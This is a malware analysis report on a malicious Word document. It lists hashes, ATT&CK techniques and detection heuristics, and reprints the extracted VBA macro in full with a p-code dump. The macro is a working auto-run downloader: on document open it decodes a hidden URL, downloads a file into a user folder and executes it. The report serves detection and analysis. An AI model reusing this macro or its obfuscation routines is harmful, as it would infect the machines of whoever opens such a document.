Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 689bf59003ebe48b…

MALICIOUS

Office (OLE)

188.5 KB Created: 2019-01-28 04:06:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: cc30a474c3e00728ec762c84f60cf55d SHA-1: 3f25f0595df2e25c78dc7b9da6638dc408673fed SHA-256: 689bf59003ebe48b68bf8ceafddaaedec5c2a275cf6630f9c492f2aabf5e4880
358 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1105 Ingress Tool Transfer

The sample contains a critical heuristic for an obfuscated auto-exec VBA loader, specifically a Document_Open macro that uses CreateObject and URLDownloadToFile. The VBA script confirms this by calling URLDownloadToFileA to download a file to 'C:\Users\Public\Documents\' and then executing it using CreateObject. This indicates the document is designed to download and run a secondary payload.

Heuristics 10

  • ClamAV: Doc.Malware.Chronos-6897935-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Malware.Chronos-6897935-0
  • Reference to URLDownloadToFile API critical SC_STR_URLDOWNLOAD
    Reference to URLDownloadToFile API
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • URLDownloadToFile in VBA critical OLE_VBA_DOWNLOAD
    URLDownloadToFile in VBA
    Matched line in script
    #If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal ZcdBqYjHHDAMTeI9K As Long, ByVal YbGMM As String, ByVal N5WAaTjMhI As String, ByVal NMQOnM9pYHijwYQBM As Long, ByVal XYDFGok2ZgnTne As Long) As LongPtr
#Else
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    SrpVeZU5m2p3982 = URLDownloadToFileA(0, MOf4Pz9Avb2ZAYc, DObp8ePN5N0, 0, 0)
Set mvvk9Kf96r3muaH = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
mvvk9Kf96r3muaH.Run DObp8ePN5N0
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    SrpVeZU5m2p3982 = URLDownloadToFileA(0, MOf4Pz9Avb2ZAYc, DObp8ePN5N0, 0, 0)
Set mvvk9Kf96r3muaH = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
mvvk9Kf96r3muaH.Run DObp8ePN5N0
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    #End If
Sub Document_Open()
Hz9nTLRgw
  • Environ() call (env variable access) low OLE_VBA_ENVIRON
    Environ() call (env variable access)
    Matched line in script
    Dim mvvk9Kf96r3muaH
DObp8ePN5N0 = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\X:.9ie05zzKfuLx@02zsYFejp~@zry`ql4.omKNez]lpx[<|wea66^")
MOf4Pz9Avb2ZAYc = dyVR7("hNEt=ttynPt]|74pOt>8:.UPP/|i(z/We[:wC;KNww0tuwr3Av.]Hb2j0~[~aR1S)g(H~caExd7dE\4IiYg<Fs(GEyh<Xq\c.urXh1[f:rgJNWi08XxsM1X(t;AXGij<~3ajXlNnUI\N..4-ictya6o@d=nmnLT2/(qIltERmtm\[N6p\(*e/Z1rAj+m3@o_I..f}7CFb,aMc.(o1ZeF84@xSRX@eaV;d")
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 14100 bytes
SHA-256: 85825a75990f18c395424a6e2f78698bc0697950e90c3258290a31a03ec48c37
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
#If VBA7 Then
Private Declare PtrSafe Function URLDownloadToFileA Lib "URLMON" (ByVal ZcdBqYjHHDAMTeI9K As Long, ByVal YbGMM As String, ByVal N5WAaTjMhI As String, ByVal NMQOnM9pYHijwYQBM As Long, ByVal XYDFGok2ZgnTne As Long) As LongPtr
#Else
Private Declare Function URLDownloadToFileA Lib "URLMON" (ByVal ZcdBqYjHHDAMTeI9K As Long, ByVal YbGMM As String, ByVal N5WAaTjMhI As String, ByVal NMQOnM9pYHijwYQBM As Long, ByVal XYDFGok2ZgnTne As Long) As Long
#End If
Sub Document_Open()
Hz9nTLRgw
End Sub
Sub Hz9nTLRgw()
Dim MOf4Pz9Avb2ZAYc
Dim SrpVeZU5m2p3982
Dim DObp8ePN5N0
Dim mvvk9Kf96r3muaH
DObp8ePN5N0 = Environ(MCk5jNez(FWjFM37eg("66C1", "24BE"), rSdI2XFZR8T("vw", "oV0"))) + dyVR7("\X:.9ie05zzKfuLx@02zsYFejp~@zry`ql4.omKNez]lpx[<|wea66^")
MOf4Pz9Avb2ZAYc = dyVR7("hNEt=ttynPt]|74pOt>8:.UPP/|i(z/We[:wC;KNww0tuwr3Av.]Hb2j0~[~aR1S)g(H~caExd7dE\4IiYg<Fs(GEyh<Xq\c.urXh1[f:rgJNWi08XxsM1X(t;AXGij<~3ajXlNnUI\N..4-ictya6o@d=nmnLT2/(qIltERmtm\[N6p\(*e/Z1rAj+m3@o_I..f}7CFb,aMc.(o1ZeF84@xSRX@eaV;d")
SrpVeZU5m2p3982 = URLDownloadToFileA(0, MOf4Pz9Avb2ZAYc, DObp8ePN5N0, 0, 0)
Set mvvk9Kf96r3muaH = CreateObject(MCk5jNez(jES4Wyj0("DE57632A0E4D6", "55CEED9673E98"), Fg2oaYYH("p8e", "nM9P")))
mvvk9Kf96r3muaH.Run DObp8ePN5N0
End Sub

Private Function MCk5jNez(MQ9mhH As String, zSfWhbamPxWzfurIxgu As String) As String
On Error Resume Next
    Dim A60nYdLlwn(0 To 255) As Byte
    Dim nSSPHYoIr64to(0 To 255) As Byte
    Dim tIMLovYN2CzM     As Byte
    Dim DZ9nLlrg      As Long
    Dim RmE5HQG5DCKfKz      As Long
    Dim DZ9nLlrgdx      As Long
    Dim HX2bCeuZapGxl7lAtRo As String
    Dim ifTkSGN0rsM78 As String
    Dim of9jSf4rX As Long
    
    For of9jSf4rX = 1 To Len(MQ9mhH) Step 2
        HX2bCeuZapGxl7lAtRo = Chr$(Val(b9UY4DO("&", "H") & Mid$(MQ9mhH, of9jSf4rX, 2)))
        ifTkSGN0rsM78 = ifTkSGN0rsM78 & HX2bCeuZapGxl7lAtRo
    Next of9jSf4rX
    
    MQ9mhH = ifTkSGN0rsM78

    For DZ9nLlrgdx = 0 To 255
      A60nYdLlwn(DZ9nLlrgdx) = DZ9nLlrgdx
      nSSPHYoIr64to(DZ9nLlrgdx) = Asc(Mid$(zSfWhbamPxWzfurIxgu, 1 + (DZ9nLlrgdx Mod Len(zSfWhbamPxWzfurIxgu)), 1))
    Next
    For DZ9nLlrg = 0 To 255
      RmE5HQG5DCKfKz = (RmE5HQG5DCKfKz + A60nYdLlwn(DZ9nLlrg) + nSSPHYoIr64to(DZ9nLlrg)) Mod 256
      tIMLovYN2CzM = A60nYdLlwn(DZ9nLlrg)
      A60nYdLlwn(DZ9nLlrg) = A60nYdLlwn(RmE5HQG5DCKfKz)
      A60nYdLlwn(RmE5HQG5DCKfKz) = tIMLovYN2CzM
    Next
    DZ9nLlrg = 0
    RmE5HQG5DCKfKz = 0
    For DZ9nLlrgdx = 1 To Len(MQ9mhH)
      DZ9nLlrg = (DZ9nLlrg + 1) Mod 256
      RmE5HQG5DCKfKz = (RmE5HQG5DCKfKz + A60nYdLlwn(DZ9nLlrg)) Mod 256
      tIMLovYN2CzM = A60nYdLlwn(DZ9nLlrg)
      A60nYdLlwn(DZ9nLlrg) = A60nYdLlwn(RmE5HQG5DCKfKz)
      A60nYdLlwn(RmE5HQG5DCKfKz) = tIMLovYN2CzM
      MCk5jNez = MCk5jNez & Chr$((vs8i4ov(A60nYdLlwn((CLng(A60nYdLlwn(DZ9nLlrg)) + A60nYdLlwn(RmE5HQG5DCKfKz)) Mod 256), Asc(Mid$(MQ9mhH, DZ9nLlrgdx, 1)))))
    Next
End Function
Private Function vs8i4ov(ByVal DZ9nLlrg As Long, ByVal RmE5HQG5DCKfKz As Long) As Long
On Error Resume Next
    If DZ9nLlrg = RmE5HQG5DCKfKz Then
      vs8i4ov = RmE5HQG5DCKfKz
    Else
      vs8i4ov = DZ9nLlrg Xor RmE5HQG5DCKfKz
    End If
End Function

Function eXbnDKMvOhj(wKteFpvxaHwznm7Cy As String, D282OXx As String)
eXbnDKMvOhj = wKteFpvxaHwznm7Cy + D282OXx
End Function
Function PDOCte(uOYS4bcO9Tv5Sm As String, Ct4ecJTlyvnTetvLg As String)
PDOCte = uOYS4bcO9Tv5Sm + Ct4ecJTlyvnTetvLg
End Function
Function FWjFM37eg(vWP7CLNPceHsgR As String, YVTI0avn As String)
FWjFM37eg = vWP7CLNPceHsgR + YVTI0avn
End Function
Function rSdI2XFZR8T(u8jGXZOprHey As String, jGDhoU5EMEZxQsO As String)
rSdI2XFZR8T = u8jGXZOprHey + jGDhoU5EMEZxQsO
End Function
Function jES4Wyj0(Kbbd2XEfM6hUrZ As String, Rxoj2nt6JOvRt9J7h0C As String)
jES4Wyj0 = Kbbd2XEfM6hUrZ + Rxoj2nt6JOvRt9J7h0C
End Function
Function Fg2oaYYH(f2LeC1XLhmbM As String, H8zb8MpRVIF65LV2 As String)
Fg2oaYYH = f2LeC1XLhmbM + H8zb8MpRVIF65LV2
End Function
Function b9UY4DO(Me3HOc9X0FYOWnZfc1J As String, YeN49j5X6g1I As String)
b9UY4DO = Me3HOc9X0FYOWnZfc1J + YeN49j5X6g1I
End Function
Function dyVR7(m7iizjNRaLZs7mS As String) As String
    Dim kSe8e(1055) As Byte
    Dim RGLgEb4I9wHuihS8() As Byte
    Dim SI61Az8Wr8QzzcEL6
    Dim uR5CaqZVOA9
    RGLgEb4I9wHuihS8 = StrConv(m7iizjNRaLZs7mS, vbFromUnicode)
    For uR5CaqZVOA9 = 0 To UBound(RGLgEb4I9wHuihS8) - 1
        If (uR5CaqZVOA9 Mod 5 = 0) Then
            kSe8e(SI61Az8Wr8QzzcEL6) = RGLgEb4I9wHuihS8(uR5CaqZVOA9)
            SI61Az8Wr8QzzcEL6 = SI61Az8Wr8QzzcEL6 + 1
        End If
    Next uR5CaqZVOA9
    dyVR7 = Left(StrConv(kSe8e, vbUnicode), SI61Az8Wr8QzzcEL6)
End Function


' Processing file: /tmp/qstore_u45aw37j
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9182 bytes
' Line #0:
' 	LbMark 
' 	Ld ThisDocument 
' 	LbIf 
' Line #1:
' 	FuncDefn (Private Declare PtrSafe Function NMQOnM9pYHijwYQBM Lib "SrpVeZU5m2p3982" (ByVal XYDFGok2ZgnTne As Long, ByVal URLMON As String, ByVal Document_Open As String, ByVal Hz9nTLRgw As Long, ByVal MOf4Pz9Avb2ZAYc As Long) As LongPtr)
' Line #2:
' 	LbMark 
' 	LbElse 
' Line #3:
' 	FuncDefn (Private Declare Function NMQOnM9pYHijwYQBM Lib "SrpVeZU5m2p3982" (ByVal XYDFGok2ZgnTne As Long, ByVal URLMON As String, ByVal Document_Open As String, ByVal Hz9nTLRgw As Long, ByVal MOf4Pz9Avb2ZAYc As Long) As Long)
' Line #4:
' 	LbMark 
' 	LbEndIf 
' Line #5:
' 	FuncDefn (Sub DObp8ePN5N0())
' Line #6:
' 	ArgsCall mvvk9Kf96r3muaH 0x0000 
' Line #7:
' 	EndSub 
' Line #8:
' 	FuncDefn (Sub mvvk9Kf96r3muaH())
' Line #9:
' 	Dim 
' 	VarDefn Environ
' Line #10:
' 	Dim 
' 	VarDefn MCk5jNez
' Line #11:
' 	Dim 
' 	VarDefn FWjFM37eg
' Line #12:
' 	Dim 
' 	VarDefn rSdI2XFZR8T
' Line #13:
' 	LitStr 0x0004 "66C1"
' 	LitStr 0x0004 "24BE"
' 	ArgsLd jES4Wyj0 0x0002 
' 	LitStr 0x0002 "vw"
' 	LitStr 0x0003 "oV0"
' 	ArgsLd Fg2oaYYH 0x0002 
' 	ArgsLd CreateObject 0x0002 
' 	ArgsLd dyVR7 0x0001 
' 	LitStr 0x0037 "\X:.9ie05zzKfuLx@02zsYFejp~@zry`ql4.omKNez]lpx[<|wea66^"
' 	ArgsLd Run 0x0001 
' 	Add 
' 	St FWjFM37eg 
' Line #14:
' 	LitStr 0x00E1 "hNEt=ttynPt]|74pOt>8:.UPP/|i(z/We[:wC;KNww0tuwr3Av.]Hb2j0~[~aR1S)g(H~caExd7dE\4IiYg<Fs(GEyh<Xq\c.urXh1[f:rgJNWi08XxsM1X(t;AXGij<~3ajXlNnUI\N..4-ictya6o@d=nmnLT2/(qIltERmtm\[N6p\(*e/Z1rAj+m3@o_I..f}7CFb,aMc.(o1ZeF84@xSRX@eaV;d"
' 	ArgsLd Run 0x0001 
' 	St Environ 
' Line #15:
' 	LitDI2 0x0000 
' 	Ld Environ 
' 	Ld FWjFM37eg 
' 	LitDI2 0x0000 
' 	LitDI2 0x0000 
' 	ArgsLd NMQOnM9pYHijwYQBM 0x0005 
' 	St MCk5jNez 
' Line #16:
' 	SetStmt 
' 	LitStr 0x000D "DE57632A0E4D6"
' 	LitStr 0x000D "55CEED9673E98"
' 	ArgsLd zSfWhbamPxWzfurIxgu 0x0002 
' 	LitStr 0x0003 "p8e"
' 	LitStr 0x0004 "nM9P"
' 	ArgsLd A60nYdLlwn 0x0002 
' 	ArgsLd CreateObject 0x0002 
' 	ArgsLd MQ9mhH 0x0001 
' 	Set rSdI2XFZR8T 
' Line #17:
' 	Ld FWjFM37eg 
' 	Ld rSdI2XFZR8T 
' 	ArgsMemCall nSSPHYoIr64to 0x0001 
' Line #18:
' 	EndSub 
' Line #19:
' Line #20:
' 	FuncDefn (Private Function CreateObject(tIMLovYN2CzM As String, DZ9nLlrg As String, id_FFFE As String) As String)
' Line #21:
' 	OnError (Resume Next) 
' Line #22:
' 	Dim 
' 	LitDI2 0x0000 
' 	LitDI2 0x00FF 
' 	VarDefn RmE5HQG5DCKfKz (As Byte)
' Line #23:
' 	Dim 
' 	LitDI2 0x0000 
' 	LitDI2 0x00FF 
' 	VarDefn DZ9nLlrgdx (As Byte)
' Line #24:
' 	Dim 
' 	VarDefn HX2bCeuZapGxl7lAtRo (As Byte) 0x0019
' Line #25:
' 	Dim 
' 	VarDefn ifTkSGN0rsM78 (As Long) 0x0016
' Line #26:
' 	Dim 
' 	VarDefn of9jSf4rX (As Long) 0x001C
' Line #27:
' 	Dim 
' 	VarDefn Chr (As Long) 0x0018
' Line #28:
' 	Dim 
' 	VarDefn Val (As String)
' Line #29:
' 	Dim 
' 	VarDefn b9UY4DO (As String)
' Line #30:
' 	Dim 
' 	VarDefn Asc (As Long)
' Line #31:
' Line #32:
' 	StartForVariable 
' 	Ld Asc 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld tIMLovYN2CzM 
' 	FnLen 
' 	LitDI2 0x0002 
' 	ForStep 
' Line #33:
' 	LitStr 0x0001 "&"
' 	LitStr 0x0001 "H"
' 	ArgsLd wKteFpvxaHwznm7Cy 0x0002 
' 	Ld tIMLovYN2CzM 
' 	Ld Asc 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	Concat 
' 	ArgsLd eXbnDKMvOhj 0x0001 
' 	ArgsLd vs8i4ov$ 0x0001 
' 	St Val 
' Line #34:
' 	Ld b9UY4DO 
' 	Ld Val 
' 	Concat 
' 	St b9UY4DO 
' Line #35:
' 	StartForVariable 
' 	Ld Asc 
' 	EndForVariable 
' 	NextVar 
' Line #36:
' Line #37:
' 	Ld b9UY4DO 
' 	St tIMLovYN2CzM 
' Line #38:
' Line #39:
' 	StartForVariable 
' 	Ld Chr 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x00FF 
' 	For 
' Line #40:
' 	Ld Chr 
' 	Ld Chr 
' 	ArgsSt RmE5HQG5DCKfKz 0x0001 
' Line #41:
' 	Ld DZ9nLlrg 
' 	LitDI2 0x0001 
' 	Ld Chr 
' 	Ld DZ9nLlrg 
' 	FnLen 
' 	Mod 
' 	Paren 
' 	Add 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd D282OXx 0x0001 
' 	Ld Chr 
' 	ArgsSt DZ9nLlrgdx 0x0001 
' Line #42:
' 	StartForVariable 
' 	Next 
' Line #43:
' 	StartForVariable 
' 	Ld ifTkSGN0rsM78 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	LitDI2 0x00FF 
' 	For 
' Line #44:
' 	Ld of9jSf4rX 
' 	Ld ifTkSGN0rsM78 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	Add 
' 	Ld ifTkSGN0rsM78 
' 	ArgsLd DZ9nLlrgdx 0x0001 
' 	Add 
' 	Paren 
' 	LitDI2 0x0100 
' 	Mod 
' 	St of9jSf4rX 
' Line #45:
' 	Ld ifTkSGN0rsM78 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	St HX2bCeuZapGxl7lAtRo 
' Line #46:
' 	Ld of9jSf4rX 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	Ld ifTkSGN0rsM78 
' 	ArgsSt RmE5HQG5DCKfKz 0x0001 
' Line #47:
' 	Ld HX2bCeuZapGxl7lAtRo 
' 	Ld of9jSf4rX 
' 	ArgsSt RmE5HQG5DCKfKz 0x0001 
' Line #48:
' 	StartForVariable 
' 	Next 
' Line #49:
' 	LitDI2 0x0000 
' 	St ifTkSGN0rsM78 
' Line #50:
' 	LitDI2 0x0000 
' 	St of9jSf4rX 
' Line #51:
' 	StartForVariable 
' 	Ld Chr 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	Ld tIMLovYN2CzM 
' 	FnLen 
' 	For 
' Line #52:
' 	Ld ifTkSGN0rsM78 
' 	LitDI2 0x0001 
' 	Add 
' 	Paren 
' 	LitDI2 0x0100 
' 	Mod 
' 	St ifTkSGN0rsM78 
' Line #53:
' 	Ld of9jSf4rX 
' 	Ld ifTkSGN0rsM78 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	Add 
' 	Paren 
' 	LitDI2 0x0100 
' 	Mod 
' 	St of9jSf4rX 
' Line #54:
' 	Ld ifTkSGN0rsM78 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	St HX2bCeuZapGxl7lAtRo 
' Line #55:
' 	Ld of9jSf4rX 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	Ld ifTkSGN0rsM78 
' 	ArgsSt RmE5HQG5DCKfKz 0x0001 
' Line #56:
' 	Ld HX2bCeuZapGxl7lAtRo 
' 	Ld of9jSf4rX 
' 	ArgsSt RmE5HQG5DCKfKz 0x0001 
' Line #57:
' 	Ld CreateObject 
' 	Ld ifTkSGN0rsM78 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	Coerce (Lng) 
' 	Ld of9jSf4rX 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	Add 
' 	Paren 
' 	LitDI2 0x0100 
' 	Mod 
' 	ArgsLd RmE5HQG5DCKfKz 0x0001 
' 	Ld tIMLovYN2CzM 
' 	Ld Chr 
' 	LitDI2 0x0001 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd D282OXx 0x0001 
' 	ArgsLd PDOCte 0x0002 
' 	Paren 
' 	ArgsLd vs8i4ov$ 0x0001 
' 	Concat 
' 	St CreateObject 
' Line #58:
' 	StartForVariable 
' 	Next 
' Line #59:
' 	EndFunc 
' Line #60:
' 	FuncDefn (Private Function PDOCte(ByVal ifTkSGN0rsM78 As Long, ByVal of9jSf4rX As Long, id_FFFE As Long) As Long)
' Line #61:
' 	OnError (Resume Next) 
' Line #62:
' 	Ld ifTkSGN0rsM78 
' 	Ld of9jSf4rX 
' 	Eq 
' 	IfBlock 
' Line #63:
' 	Ld of9jSf4rX 
' 	St PDOCte 
' Line #64:
' 	ElseBlock 
' Line #65:
' 	Ld ifTkSGN0rsM78 
' 	Ld of9jSf4rX 
' 	Xor 
' 	St PDOCte 
' Line #66:
' 	EndIfBlock 
' Line #67:
' 	EndFunc 
' Line #68:
' Line #69:
' 	FuncDefn (Function uOYS4bcO9Tv5Sm(Ct4ecJTlyvnTetvLg As String, vWP7CLNPceHsgR As String, id_FFFE As Variant))
' Line #70:
' 	Ld Ct4ecJTlyvnTetvLg 
' 	Ld vWP7CLNPceHsgR 
' 	Add 
' 	St uOYS4bcO9Tv5Sm 
' Line #71:
' 	EndFunc 
' Line #72:
' 	FuncDefn (Function YVTI0avn(u8jGXZOprHey As String, jGDhoU5EMEZxQsO As String, id_FFFE As Variant))
' Line #73:
' 	Ld u8jGXZOprHey 
' 	Ld jGDhoU5EMEZxQsO 
' 	Add 
' 	St YVTI0avn 
' Line #74:
' 	EndFunc 
' Line #75:
' 	FuncDefn (Function jES4Wyj0(Kbbd2XEfM6hUrZ As String, Rxoj2nt6JOvRt9J7h0C As String, id_FFFE As Variant))
' Line #76:
' 	Ld Kbbd2XEfM6hUrZ 
' 	Ld Rxoj2nt6JOvRt9J7h0C 
' 	Add 
' 	St jES4Wyj0 
' Line #77:
' 	EndFunc 
' Line #78:
' 	FuncDefn (Function Fg2oaYYH(f2LeC1XLhmbM As String, H8zb8MpRVIF65LV2 As String, id_FFFE As Variant))
' Line #79:
' 	Ld f2LeC1XLhmbM 
' 	Ld H8zb8MpRVIF65LV2 
' 	Add 
' 	St Fg2oaYYH 
' Line #80:
' 	EndFunc 
' Line #81:
' 	FuncDefn (Function zSfWhbamPxWzfurIxgu(Me3HOc9X0FYOWnZfc1J As String, YeN49j5X6g1I As String, id_FFFE As Variant))
' Line #82:
' 	Ld Me3HOc9X0FYOWnZfc1J 
' 	Ld YeN49j5X6g1I 
' 	Add 
' 	St zSfWhbamPxWzfurIxgu 
' Line #83:
' 	EndFunc 
' Line #84:
' 	FuncDefn (Function A60nYdLlwn(m7iizjNRaLZs7mS As String, kSe8e As String, id_FFFE As Variant))
' Line #85:
' 	Ld m7iizjNRaLZs7mS 
' 	Ld kSe8e 
' 	Add 
' 	St A60nYdLlwn 
' Line #86:
' 	EndFunc 
' Line #87:
' 	FuncDefn (Function wKteFpvxaHwznm7Cy(RGLgEb4I9wHuihS8 As String, SI61Az8Wr8QzzcEL6 As String, id_FFFE As Variant))
' Line #88:
' 	Ld RGLgEb4I9wHuihS8 
' 	Ld SI61Az8Wr8QzzcEL6 
' 	Add 
' 	St wKteFpvxaHwznm7Cy 
' Line #89:
' 	EndFunc 
' Line #90:
' 	FuncDefn (Function Run(uR5CaqZVOA9 As String, id_FFFE As String) As String)
' Line #91:
' 	Dim 
' 	OptionBase 
' 	LitDI2 0x041F 
' 	VarDefn StrConv (As Byte)
' Line #92:
' 	Dim 
' 	VarDefn vbFromUnicode (As Byte)
' Line #93:
' 	Dim 
' 	VarDefn vbUnicode
' Line #94:
' 	Dim 
' 	VarDefn id_029C
' Line #95:
' 	Ld uR5CaqZVOA9 
' 	Ld id_02A0 
' 	ArgsLd id_029E 0x0002 
' 	St vbFromUnicode 
' Line #96:
' 	StartForVariable 
' 	Ld id_029C 
' 	EndForVariable 
' 	LitDI2 0x0000 
' 	Ld vbFromUnicode 
' 	FnUBound 0x0000 
' 	LitDI2 0x0001 
' 	Sub 
' 	For 
' Line #97:
' 	Ld id_029C 
' 	LitDI2 0x0005 
' 	Mod 
' 	LitDI2 0x0000 
' 	Eq 
' 	Paren 
' 	IfBlock 
' Line #98:
' 	Ld id_029C 
' 	ArgsLd vbFromUnicode 0x0001 
' 	Ld vbUnicode 
' 	ArgsSt StrConv 0x0001 
' Line #99:
' 	Ld vbUnicode 
' 	LitDI2 0x0001 
' 	Add 
' 	St vbUnicode 
' Line #100:
' 	EndIfBlock 
' Line #101:
' 	StartForVariable 
' 	Ld id_029C 
' 	EndForVariable 
' 	NextVar 
' Line #102:
' 	Ld StrConv 
' 	Ld id_02A2 
' 	ArgsLd id_029E 0x0002 
' 	Ld vbUnicode 
' 	ArgsLd Left 0x0002 
' 	St Run 
' Line #103:
' 	EndFunc 
' Line #104:

Open this report in the interactive analyzer, or submit your own file for analysis.